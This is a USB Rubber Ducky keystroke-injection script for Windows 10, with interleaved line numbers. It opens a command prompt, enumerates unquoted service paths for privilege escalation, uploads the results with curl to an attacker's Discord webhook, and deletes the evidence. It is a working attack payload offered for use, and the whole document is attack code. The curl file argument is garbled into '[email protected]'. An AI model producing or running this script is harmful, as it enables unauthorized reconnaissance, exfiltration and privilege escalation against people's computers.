1
REM     Title: Priv-Paths
2
REM     Author: atomiczsec
3
REM     Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
4
REM     Target: Windows 10
5

6

7
REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky
8
DEFINE #d YOUR-DISCORD-WEBHOOK
9

10
DELAY 3000
11
GUI r 
12
DELAY 1000
13
STRING cmd 
14
ENTER
15
DELAY 500
16
STRING cd %HOMEPATH%
17
ENTER
18
DELAY 1000
19
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
20
ENTER
21
DELAY 1000
22
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "[email protected]"
23
SPACE
24
STRING #d
25
ENTER
26
DELAY 200
27
STRING del p.txt
28
ENTER
29
DELAY 100
30
STRING exit
31
ENTER
32

33